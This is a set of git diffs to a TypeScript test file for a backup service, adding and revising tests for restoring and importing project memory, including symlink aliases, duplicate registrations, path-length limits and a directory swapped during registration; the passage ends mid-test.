         writeSafetySnapshot: () => {
           snapshots += 1;
           return Promise.resolve();
@@ -1130,7 +1164,11 @@ describe("BackupService project imports", () => {
     const service = createService(tempDir, {
       payload: createPayload({
         validateRestore: () =>
-          Promise.resolve({ hasProjectBundle: true, projectImports: candidates }),
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: candidates,
+            matchedProjectPaths: [],
+          }),
         importProjectMemory: (options) => {
           events.push(`import:${options.targetPath}`);
           return Promise.resolve({
@@ -1189,10 +1227,22 @@ describe("BackupService project imports", () => {
   test("tolerates a project already registered at the target path", async () => {
     const target = path.join(tempDir, "already");
     await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(target, { workspaces: [] });
+    const importedTo: string[] = [];
     const service = createService(tempDir, {
+      config,
       payload: createPayload({
         validateRestore: () =>
-          Promise.resolve({ hasProjectBundle: true, projectImports: [candidate()] }),
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        importProjectMemory: (options) => {
+          importedTo.push(options.targetPath);
+          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+        },
       }),
     });
     service.setProjectService({
@@ -1208,24 +1258,253 @@ describe("BackupService project imports", () => {
     if (result.success) {
       expect(result.data.projectImportResults[0]?.status).toBe("imported");
     }
+    expect(importedTo).toEqual([target]);
   });
 
-  test("asks the snapshot to cover project memory only when the payload carries a bundle", async () => {
-    const flags: boolean[] = [];
-    const payload = (hasProjectBundle: boolean) =>
-      createPayload({
-        validateRestore: () => Promise.resolve({ hasProjectBundle, projectImports: [] }),
-        writeSafetySnapshot: (_snapshotRoot, options) => {
-          flags.push(options.includeProjectMemory);
+  test("imports to the registered identity when the target is a symlink alias of it", async () => {
+    const realParent = path.join(tempDir, "real");
+    const registered = path.join(realParent, "proj");
+    await fs.mkdir(registered, { recursive: true });
+    const aliasParent = path.join(tempDir, "alias");
+    await fs.symlink(realParent, aliasParent, "dir");
+    const aliasTarget = path.join(aliasParent, "proj");
+
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(registered, { workspaces: [] });
+    const importedTo: string[] = [];
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        importProjectMemory: (options) => {
+          importedTo.push(options.targetPath);
+          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+        },
+      }),
+    });
+    // ProjectService resolves the alias to the registered project and reports a duplicate.
+    service.setProjectService({
+      create: () => Promise.resolve(Err("Project already exists")),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: aliasTarget }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      // Memory is keyed by the registered path's hash; the alias would land it where the
+      // project never looks.
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "imported",
+        targetPath: registered,
+      });
+    }
+    expect(importedTo).toEqual([registered]);
+  });
+
+  test("fails an import whose duplicate registration cannot be resolved to a path", async () => {
+    const target = path.join(tempDir, "unresolved");
+    await fs.mkdir(target);
+    let imports = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        importProjectMemory: () => {
+          imports += 1;
+          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+        },
+      }),
+    });
+    // Duplicate reported, but nothing in config matches the target or its real path.
+    service.setProjectService({
+      create: () => Promise.resolve(Err("Project already exists")),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      const [imported] = result.data.projectImportResults;
+      expect(imported).toMatchObject({ status: "failed", writtenFiles: [] });
+      expect(imported?.message).toContain("already registered under a different path");
+    }
+    expect(imports).toBe(0);
+  });
+
+  test("reports the files a failed import had already written", async () => {
+    const target = path.join(tempDir, "partial");
+    await fs.mkdir(target);
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        importProjectMemory: () =>
+          Promise.reject(
+            new ProjectMemoryWriteError("disk full", {
+              written: ["memory/project/alpha-abc/first.md"],
+              skipped: ["memory/project/alpha-abc/kept.md"],
+            })
+          ),
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      // The partial progress is the user's cleanup list; an empty list would claim the
+      // failed import changed nothing.
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: "disk full",
+        writtenFiles: ["memory/project/alpha-abc/first.md"],
+        skippedFiles: ["memory/project/alpha-abc/kept.md"],
+      });
+    }
+  });
+
+  test("carries the validated match set and the snapshot path into the restore", async () => {
+    const seen: Array<{ snapshotPath: string; matched: readonly string[] }> = [];
+    const snapshot = { root: null as string | null };
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [],
+            matchedProjectPaths: ["/home/dev/src/alpha"],
+          }),
+        writeSafetySnapshot: (root) => {
+          snapshot.root = root;
           return Promise.resolve();
         },
-      });
+        restore: (options) => {
+          seen.push({ snapshotPath: options.snapshotPath, matched: options.matchedProjectPaths });
+          return Promise.resolve({
+            changedFiles: [],
+            localOnlyFiles: [],
+            projectBundleSkipped: false,
+            restoredProjectMemory: [],
+          });
+        },
+      }),
+    });
 
-    const withBundle = createService(tempDir, { payload: payload(true) });
-    expect((await withBundle.restore({ ...SETTINGS, includeProjects: true })).success).toBe(true);
-    const withoutToggle = createService(tempDir, { payload: payload(false) });
-    expect((await withoutToggle.restore(SETTINGS)).success).toBe(true);
+    expect((await service.restore({ ...SETTINGS, includeProjects: true })).success).toBe(true);
+    // The store re-partitions the bundle itself but must only write what validation (and
+    // therefore the snapshot) covered, into the same snapshot directory.
+    const snapshotRoot = snapshot.root;
+    if (snapshotRoot === null) throw new Error("Expected the safety snapshot to be written");
+    expect(seen).toEqual([{ snapshotPath: snapshotRoot, matched: ["/home/dev/src/alpha"] }]);
+  });
 
-    expect(flags).toEqual([true, false]);
+  test("announces restored and imported project memory to the memory notifier", async () => {
+    const target = path.join(tempDir, "imported");
+    await fs.mkdir(target);
+    const notified: Array<{ projectPath: string; relPaths: readonly string[] }> = [];
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: ["/home/dev/src/matched"],
+          }),
+        restore: () =>
+          Promise.resolve({
+            changedFiles: ["memory/project/matched-abc/deep/notes.md"],
+            localOnlyFiles: [],
+            projectBundleSkipped: false,
+            restoredProjectMemory: [
+              {
+                projectPath: "/home/dev/src/matched",
+                files: ["memory/project/matched-abc/deep/notes.md"],
+              },
+            ],
+          }),
+        importProjectMemory: () =>
+          Promise.resolve({
+            writtenFiles: ["memory/project/imported-def/todo.md"],
+            skippedFiles: [],
+          }),
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
+    });
+    service.setMemoryNotifier({
+      notifyExternalProjectChange: (projectPath, relPaths) => {
+        notified.push({ projectPath, relPaths });
+      },
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    // Scope-relative paths, as a project memory store addresses them.
+    expect(notified).toEqual([
+      { projectPath: "/home/dev/src/matched", relPaths: ["deep/notes.md"] },
+      { projectPath: target, relPaths: ["todo.md"] },
+    ]);
+  });
+
+  test("keeps a concurrently saved project-backup toggle when recording a commit", async () => {
+    const config = new TestBackupConfig(tempDir);
+    const service = createService(tempDir, {
+      config,
+      gitRepo: createGitRepo({
+        commitAndPush: () => {
+          // Another window saved the same repository with the toggle flipped while this
+          // push was running against the old settings.
+          config.state = {
+            ...config.state,
+            settingsBackup: { ...SETTINGS, includeProjects: true },
+          };
+          return Promise.resolve({
+            commit: "pushed-commit",
+            changed: true,
+            credential: "gh" as const,
+          });
+        },
+      }),
+    });
+    expect((await service.saveSettings(SETTINGS)).success).toBe(true);
+
+    expect((await service.push(SETTINGS)).success).toBe(true);
+
+    // Recording the commit must not revert the newer save to the stale in-flight value.
+    expect(service.getSettings()).toEqual({
+      ...SETTINGS,
+      includeProjects: true,
+      lastPushedCommit: "pushed-commit",
+    });
   });
 });

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1921,13 +1921,15 @@ describe("BackupService project imports", () => {
     // resolves on the next attempt.
     const realRealpath = fs.realpath.bind(fs);
     let stalledOnce = false;
-    const realpath = spyOn(fs, "realpath").mockImplementation(((target, options) => {
-      if (String(target) === registeredAlias && !stalledOnce) {
+    // Cast through unknown: `typeof fs.realpath` also carries the `.native` member, which a
+    // plain implementation function cannot satisfy.
+    const realpath = spyOn(fs, "realpath").mockImplementation(((target: string) => {
+      if (target === registeredAlias && !stalledOnce) {
         stalledOnce = true;
         return Promise.reject(new Error("EIO: mount unavailable"));
       }
-      return realRealpath(target, options);
-    }) as typeof fs.realpath);
+      return realRealpath(target);
+    }) as unknown as typeof fs.realpath);
     try {
       const result = await service.restore(
         { ...SETTINGS, includeProjects: true },

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -14,6 +14,7 @@ import {
 import {
   BackupService,
   type BackupProjectImporter,
+  type BackupProjectRegistrar,
   BackupServiceError,
   type BackupGitRepo,
   type BackupPayloadStore,
@@ -114,6 +115,14 @@ function importsWith(
     Promise.resolve()
 ): BackupProjectImporter {
   return { assertProjectMemoryAllowed, importProjectMemory };
+}
+
+/** A registrar mock: the given create() plus a no-op display-name setter unless overridden. */
+function registrar(
+  create: BackupProjectRegistrar["create"],
+  setDisplayName: BackupProjectRegistrar["setDisplayName"] = () => Promise.resolve()
+): BackupProjectRegistrar {
+  return { create, setDisplayName };
 }
 
 function createService(
@@ -1196,14 +1205,14 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => {
+    service.setProjectService(
+      registrar((projectPath) => {
         events.push(`create:${projectPath}`);
         return Promise.resolve(
           projectPath === goodDir ? Ok({ normalizedPath: projectPath }) : Err("registration failed")
         );
-      },
-    });
+      })
+    );
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1266,9 +1275,7 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: () => Promise.resolve(Err("Project already exists")),
-    });
+    service.setProjectService(registrar(() => Promise.resolve(Err("Project already exists"))));
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1312,9 +1319,7 @@ describe("BackupService project imports", () => {
       }),
     });
     // ProjectService resolves the alias to the registered project and reports a duplicate.
-    service.setProjectService({
-      create: () => Promise.resolve(Err("Project already exists")),
-    });
+    service.setProjectService(registrar(() => Promise.resolve(Err("Project already exists"))));
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1348,9 +1353,9 @@ describe("BackupService project imports", () => {
           }),
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
-    });
+    service.setProjectService(
+      registrar((projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })))
+    );
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1391,12 +1396,12 @@ describe("BackupService project imports", () => {
         },
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => {
+    service.setProjectService(
+      registrar((projectPath) => {
         registrations += 1;
         return Promise.resolve(Ok({ normalizedPath: projectPath }));
-      },
-    });
+      })
+    );
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1443,9 +1448,7 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: () => Promise.resolve(Err("Project already exists")),
-    });
+    service.setProjectService(registrar(() => Promise.resolve(Err("Project already exists"))));
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1455,6 +1458,108 @@ describe("BackupService project imports", () => {
     expect(result.success).toBe(true);
     // The memory scope actually written is the registered project's, not the alias's.
     expect(preflighted).toEqual([registered]);
+  });
+
+  test("imports into a project registered under a different alias of the same directory", async () => {
+    const realParent = path.join(tempDir, "real");
+    await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
+    const aliasA = path.join(tempDir, "alias-a");
+    const aliasB = path.join(tempDir, "alias-b");
+    await fs.symlink(realParent, aliasA, "dir");
+    await fs.symlink(realParent, aliasB, "dir");
+    const registeredAlias = path.join(aliasA, "repo");
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(registeredAlias, { workspaces: [] });
+    const importedTo: string[] = [];
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    // create() would happily register the second alias; the service must not ask it to.
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: path.join(aliasB, "repo") }] }
+    );
+
+    expect(result.success).toBe(true);
+    expect(registrations).toBe(0);
+    // One checkout, one registration, one memory scope.
+    expect(importedTo).toEqual([registeredAlias]);
+  });
+
+  test("applies the backed-up name to a newly registered project only", async () => {
+    const fresh = path.join(tempDir, "checkout");
+    const existing = path.join(tempDir, "existing");
+    await fs.mkdir(fresh);
+    await fs.mkdir(existing);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(existing, { workspaces: [], displayName: "Local name" });
+    const named: Array<[string, string]> = [];
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [
+              candidate({ name: "Rocket Science" }),
+              candidate({ name: "Probe", token: "probe-token", sourcePath: "/src/probe" }),
+            ],
+            matchedProjectPaths: [],
+          }),
+      }),
+    });
+    service.setProjectService(
+      registrar(
+        (projectPath) =>
+          Promise.resolve(
+            projectPath === existing
+              ? Err("Project already exists")
+              : Ok({ normalizedPath: projectPath })
+          ),
+        (projectPath, displayName) => {
+          named.push([projectPath, displayName]);
+          return Promise.resolve();
+        }
+      )
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      {
+        projectImports: [
+          { token: "candidate-token", targetPath: fresh },
+          { token: "probe-token", targetPath: existing },
+        ],
+      }
+    );
+
+    expect(result.success).toBe(true);
+    // "checkout" would otherwise show up under its basename, not the name it was backed
+    // up with; the already registered project keeps its local name.
+    expect(named).toEqual([[fresh, "Rocket Science"]]);
   });
 
   test("keeps a candidate on offer when its import fails per-candidate", async () => {
@@ -1471,9 +1576,7 @@ describe("BackupService project imports", () => {
           }),
       }),
     });
-    service.setProjectService({
-      create: () => Promise.resolve(Err("registration failed")),
-    });
+    service.setProjectService(registrar(() => Promise.resolve(Err("registration failed"))));
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1551,9 +1654,7 @@ describe("BackupService project imports", () => {
       }),
     });
     // Duplicate reported, but nothing in config matches the target or its real path.
-    service.setProjectService({
-      create: () => Promise.resolve(Err("Project already exists")),
-    });
+    service.setProjectService(registrar(() => Promise.resolve(Err("Project already exists"))));
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1593,9 +1694,9 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
-    });
+    service.setProjectService(
+      registrar((projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })))
+    );
 
     const result = await service.restore(
       { ...SETTINGS, includeProjects: true },
@@ -1685,9 +1786,9 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
-    });
+    service.setProjectService(
+      registrar((projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })))
+    );
     service.setMemoryNotifier({
       notifyExternalProjectChange: (projectPath) => {
         notified.push(projectPath);
@@ -1730,9 +1831,9 @@ describe("BackupService project imports", () => {
           ),
       }),
     });
-    service.setProjectService({
-      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
-    });
+    service.setProjectService(
+      registrar((projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })))
+    );
     expect((await service.saveSettings({ ...SETTINGS, includeProjects: true })).success).toBe(true);
 
     const result = await service.restore(

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1634,6 +1634,44 @@ describe("BackupService project imports", () => {
     expect(registrations).toBe(1);
   });
 
+  test("refuses an import into a project that a matched entry restores in the same run", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(target, { workspaces: [] });
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            // Another backed-up project already restores into `target` on this machine.
+            matchedProjects: [
+              { sourcePath: "/home/dev/src/other", projectPath: target, localMemoryDir: "t-abc" },
+            ],
+          }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("already receives a backed-up project's memory");
+    }
+    // Refused during planning: two project identities would otherwise merge into one scope.
+    expect(snapshots).toBe(0);
+  });
+
   test("refuses network and device import targets before probing them", async () => {
     let probes = 0;
     const realLstat = fs.lstat.bind(fs);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1622,6 +1622,8 @@ describe("BackupService project imports", () => {
     if (!result.success) {
       expect(result.error.message).toContain("disk fault");
       expect(result.error.snapshotPath).toBeDefined();
+      // Newly created files are not in the snapshot; the error is the cleanup list.
+      expect(result.error.files).toEqual(["memory/project/alpha-abc/notes.md"]);
     }
     // Disk changed for alpha even though the restore failed on beta.
     expect(notified).toEqual(["/home/dev/src/alpha"]);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -2092,6 +2092,52 @@ describe("BackupService project imports", () => {
     expect(snapshots).toBe(0);
   });
 
+  test("refuses an import into a directory at another backed-up project's recorded path", async () => {
+    // Local directories at two other entries' recorded paths: one still on offer, one matched.
+    const otherCandidatePath = path.join(tempDir, "beta");
+    const matchedSourcePath = path.join(tempDir, "gamma-source");
+    await fs.mkdir(otherCandidatePath);
+    await fs.mkdir(matchedSourcePath);
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [
+              candidate(),
+              candidate({ sourcePath: otherCandidatePath, name: "beta", token: "beta-token" }),
+            ],
+            matchedProjects: [
+              {
+                sourcePath: matchedSourcePath,
+                projectPath: path.join(tempDir, "gamma-local"),
+                localMemoryDir: "g-abc",
+              },
+            ],
+          }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    for (const targetPath of [otherCandidatePath, matchedSourcePath]) {
+      // Registering it would make every later restore match the other entry there by exact
+      // path, writing that entry's memory into this candidate's scope.
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath }] }
+      );
+      expect(result.success).toBe(false);
+      if (!result.success) {
+        expect(result.error.message).toContain("recorded path of another backed-up project");
+      }
+    }
+    expect(snapshots).toBe(0);
+  });
+
   test("refuses network and device import targets before probing them", async () => {
     let probes = 0;
     const realLstat = fs.lstat.bind(fs);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1851,6 +1851,103 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("refuses an import target longer than the manifest's path cap before the snapshot", async () => {
+    // Deep enough to pass 1024 characters while every component stays under NAME_MAX.
+    const target = path.join(tempDir, ...Array.from({ length: 6 }, () => "p".repeat(200)));
+    await fs.mkdir(target, { recursive: true });
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    // The import itself could land, but the recovery copy a later matched restore of this
+    // project takes could not record the path, failing every such restore after its snapshot.
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("longer than");
+      expect(result.error.snapshotPath).toBeUndefined();
+    }
+    expect(snapshots).toBe(0);
+  });
+
+  test("re-probes a registered path whose real path did not resolve during planning", async () => {
+    const realParent = path.join(tempDir, "real");
+    await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
+    const aliasA = path.join(tempDir, "alias-a");
+    const aliasB = path.join(tempDir, "alias-b");
+    await fs.symlink(realParent, aliasA, "dir");
+    await fs.symlink(realParent, aliasB, "dir");
+    const registeredAlias = path.join(aliasA, "repo");
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(registeredAlias, { workspaces: [] });
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => Promise.resolve({ writtenFiles: [], skippedFiles: [] }))
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+    // The registered alias fails to resolve once (a stalled mount at planning time) and
+    // resolves on the next attempt.
+    const realRealpath = fs.realpath.bind(fs);
+    let stalledOnce = false;
+    const realpath = spyOn(fs, "realpath").mockImplementation(((target, options) => {
+      if (String(target) === registeredAlias && !stalledOnce) {
+        stalledOnce = true;
+        return Promise.reject(new Error("EIO: mount unavailable"));
+      }
+      return realRealpath(target, options);
+    }) as typeof fs.realpath);
+    try {
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath: path.join(aliasB, "repo") }] }
+      );
+      expect(result.success).toBe(true);
+      // Reusing the unresolved planning result would have registered the second alias; the
+      // execution-time lookup must probe it again and see the same directory.
+      expect(registrations).toBe(0);
+      if (result.success) {
+        expect(result.data.projectImportResults[0]).toMatchObject({
+          status: "failed",
+          message: expect.stringContaining(registeredAlias) as string,
+        });
+      }
+    } finally {
+      realpath.mockRestore();
+    }
+  });
+
   test("refuses an import into a project that a matched entry restores in the same run", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1693,6 +1693,9 @@ describe("BackupService project imports", () => {
         status: "failed",
         message: expect.stringContaining("registered on this machine since the preview") as string,
       });
+      // Not re-offered: only a new preview can present this entry, as a matched one, and
+      // retrying the stale approval could only fail again.
+      expect(result.data.unapprovedProjectImports).toEqual([]);
     }
   });
 

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -133,7 +133,9 @@ type RegistrarCreate = Parameters<
 >[0]["create"];
 
 function registrar(create: RegistrarCreate): BackupProjectRegistrar {
-  return { withRegistrationLock: (fn) => fn({ create }) };
+  return {
+    withRegistrationLock: (fn) => fn({ create, assertStillOwned: () => Promise.resolve() }),
+  };
 }
 
 function createService(

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -2223,6 +2223,112 @@ describe("BackupService project imports", () => {
     }
   }, 20_000);
 
+  test("imports an entry registered here under another memory directory name", async () => {
+    // The entry's recorded path is registered on this machine, but its recorded memory
+    // directory name is not the one this host computes (a path from another OS), so it is
+    // offered as an import into its own registered path — which must stay importable rather
+    // than being refused as "registered since the preview" every time.
+    const registered = path.join(tempDir, "alpha");
+    await fs.mkdir(registered);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(registered, { workspaces: [] });
+    let registrations = 0;
+    let imports = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate({ sourcePath: registered })],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => {
+              imports += 1;
+              return Promise.resolve({ writtenFiles: ["notes.md"], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar(() => {
+        registrations += 1;
+        return Promise.resolve(Err("Project already exists"));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: registered }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "imported",
+        targetPath: registered,
+        registered: false,
+      });
+      expect(result.data.unapprovedProjectImports).toEqual([]);
+    }
+    expect(imports).toBe(1);
+    expect(registrations).toBe(0);
+  });
+
+  test("does not register a target while a registered path failed to resolve", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const denied = path.join(tempDir, "denied");
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(denied, { workspaces: [] });
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => Promise.resolve({ writtenFiles: [], skippedFiles: [] }))
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+    const realRealpath = fs.realpath.bind(fs);
+    const realpath = spyOn(fs, "realpath").mockImplementation(((probed: string) =>
+      // Not a stall, an immediate refusal: what the path leads to is as unknown either way.
+      probed === denied
+        ? Promise.reject(Object.assign(new Error("EACCES: permission denied"), { code: "EACCES" }))
+        : realRealpath(probed)) as unknown as typeof fs.realpath);
+    try {
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath: target }] }
+      );
+      expect(result.success).toBe(true);
+      expect(registrations).toBe(0);
+      if (result.success) {
+        expect(result.data.projectImportResults[0]).toMatchObject({
+          status: "failed",
+          message: expect.stringContaining("could not be checked against 1 registered") as string,
+        });
+      }
+    } finally {
+      realpath.mockRestore();
+    }
+  });
+
   test("refuses an import into a directory at another backed-up project's recorded path", async () => {
     // Local directories at two other entries' recorded paths: one still on offer, one matched.
     const otherCandidatePath = path.join(tempDir, "beta");

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1802,6 +1802,55 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("does not import into a target replaced while it was being registered", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    const importedTo: string[] = [];
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    // The swap lands during create()'s own asynchronous validation, after the pre-create
+    // identity check passed: registration goes through by path, for the new directory.
+    service.setProjectService(
+      registrar(async (projectPath) => {
+        await fs.rename(target, path.join(tempDir, "target-moved"));
+        await fs.mkdir(target);
+        return Ok({ normalizedPath: projectPath });
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    // The approved source's memory must not follow the path into the other checkout.
